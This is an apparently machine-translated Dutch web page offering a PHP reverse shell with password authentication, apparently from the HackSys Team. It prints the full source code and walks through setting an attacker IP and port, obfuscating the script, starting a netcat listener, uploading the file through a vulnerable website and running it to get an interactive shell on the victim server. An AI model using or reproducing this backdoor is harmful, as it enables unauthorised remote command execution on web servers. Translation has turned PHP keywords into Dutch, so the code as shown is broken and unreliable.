Reverse Shell v1.0 PHP – Verificatie
Product door:
Ashfaq Ansari
Versie:
1.0
Prijs:
Gratis

Beoordeeld door:
Rating:
5
Op Oktober 9, 2012
Laatst gewijzigd:Januari 18, 2013

Overzicht:

Reverse Connect PHP Shell met ingebouwde authenticatie functie. Geweldig script aan uw achterdeur te beschermen.

Introductie

 

Deze tool is bedoeld voor pentest situatie waar je upload hebt toegang tot een webserver die draait PHP.
Upload deze script om ergens in de web root voer het vervolgens door naar de juiste URL in je browser. Het script zal een uitgaande TCP-verbinding van de webserver te openen naar een host en poort gedefinieerd in het script. Gebonden aan deze TCP-verbinding zal een shell worden.
 

Dit zal een goede interactieve shell waarin je interective programma's zoals kan uitvoeren zijn Telnet en SSH.
Deze shell heeft een ingebouwde authenticatie functie die iemand anders voorkomt misbruik maken van uw achterdeur.
Het verschilt van webformulier gebaseerde shell die u toelaten om een ​​commando te sturen, dan terug je de uitgang.
 

Wijzig de bron

 

1
2
3
$ip = "127.0.0.1"; #Verander dit naar uw openbare IP
$port = 4444;      #Verander dit naar uw Port
$wachtwoord = base64_decode("aGFja3N5c3RlYW0="); #Standaard wachtwoord: hacksysteam (MD5)

 

Verander de waarden als per uw behoefte en situatie.
 

Verduisteren De Bron

 

Zodra u de wijziging hebt gedaan, U mag gebruik maken van een online PHP Obfuscator aan de PHP-script coderen.
 

Voorbeeld: http://www.codeeclipse.com/
 

Voordat verdoezelen, wijzigt u de bovenstaande waarden volgens uw behoeften.
 

Setup Netcat Luisteraar

 

Start een Netcat luisteraar op een host en poort die toegankelijk is voor de webserver zal zijn.
Gebruik dezelfde poort hier als u hebt opgegeven in de omgekeerde shell script bijvoorbeeld (4444):
 

1
root @ bt:~ # nc -lvvp 4444

 

Upload The Script en voer het uit

 

Met behulp van de kwetsbaarheid door u ontdekt in de website, uploaden reverse_shell.php.
Voer het script gewoon door te bladeren naar de nieuw geüploade bestand in uw webbrowser.
 

1
http://<Slachtoffer IP>/<Upload Pad>/reverse_shell.php

 

Nota: U zal geen uitgang op de webpagina niet zien, Zij blijft in de wacht-stand als zijn succesvolle.
 

Loot met je shell

 

Source Code

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Reverse Shell v1.0 #
#             Authenticatie Feature #
#                                                 #
#            Hacksys Team - Panthera #
#             Auteur: Ashfaq Ansari #
#            hacksysteam@hotmail.com #
#          http://hacksys.vfreaks.com #
#              Ontworpen voor Linux #
#             Dankzij lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$VERSIE = "1.0";
$ip = "127.0.0.1"; #Wijzig deze
$port = 4444;      #Wijzig deze
$wachtwoord = base64_decode(&quot;aGFja3N5c3RlYW0="); #Standaard wachtwoord: hacksysteam (MD5)

$banier = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    Auteur: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com /\n\n"
);

$pwd = shell_exec("Pwd");
$sysinfo = shell_exec("Uname -a");
$id = shell_exec('Id | cut -d "(" -f 2 | cut -d ")" -f 1 ');
$datum = shell_exec("Date");
$alleen = 1337;
$info =
("
System Information:\n$sysinfo
Huidige Working Directory: $pwd
User Group: $id
Huidige datum en tijd: $datum\n
"
);

afdrukken "\nVerbinding probeert te maken: $ip op poort $port ...\n\n";

$sockfd = fsockopen($ip , $port , $errno, $errstr );

indien($errno != 0)
  {
    afdrukken "\n****** Fout opgetreden ******\nFout Nnumber: $errno\nFout String: $errstr\n\n";
    de(0);
  }
anders indien (!$sockfd)
  {
    afdrukken "Fatal : Een onverwachte fout is opgetreden bij het proberen te verbinden!\n";
  }
anders
  {
    afdrukken "Verbonden met: $ip op poort $port ...\n\n";
    fputs ($sockfd , $banier);
    fputs($sockfd ,"Enter Password: ");
    $getpass = trimmen(fgets($sockfd, strlen($wachtwoord) + 2));

    indien ($getpass == $wachtwoord)
    {
      fputs($sockfd, "\nAuthenticatie Succesvolle..\n");
      fputs($sockfd, $info);
      terwijl(!EOF($sockfd))
      {
    $cmdPrompt = trimmen($id) . "@" . trimmen($ip) . ":~" . trimmen($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $commando = trimmen(fgets($sockfd, $alleen));
        indien (trimmen($commando) == "Verlaten")
    {
      fputs($sockfd ,"\nAfgebroken door de gebruiker ... Verlaten ..." );
      fclose($sockfd);
      de(0);
    }
    fputs($sockfd , "\n" . shell_exec($commando) . "\n");
      }
      fclose($sockfd);
      de(0);
    }
    anders
    {
      fputs($sockfd ,"\nOngeldig wachtwoord ... Stoppen met ...");
      fclose($sockfd);
      de(0);
    }
  }
?>

 

Screenshot

 


 

Download Reverse Shell v1.0 PHP – Verificatie

 

Reverse_Shell_v1.0.zip

 
 
 

21,007 totaal aantal vertoningen, 15 aantal vertoningen vandaag

De volgende twee tabbladen te veranderen hieronder inhoud.

Ashfaq Ansari

Beveiliging Onderzoeker
Ashfaq Ansari is de oprichter van HackSys Team codenaam "Panthera". Hij is een security-onderzoeker met ervaring in verschillende aspecten van informatiebeveiliging. Hij is auteur "HackSys Extreme Kwetsbare Driver" en "Shellcode of Death". Hij heeft ook geschreven en publiceerde diverse whitepapers op een laag level software uitbuiting. Zijn belangrijkste interesse ligt in "Low Level Exploitation", "Reverse Engineering", "Programma Analyse" en "Hybride Fuzzing". Hij is een fanboy van Kunstmatige Intelligentie en Machine Learning. Hij is het hoofdstuk voorsprong van null Pune.

Laatste berichten van Ashfaq Ansari (bekijk alle)

Laat een reactie achter

Uw e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd *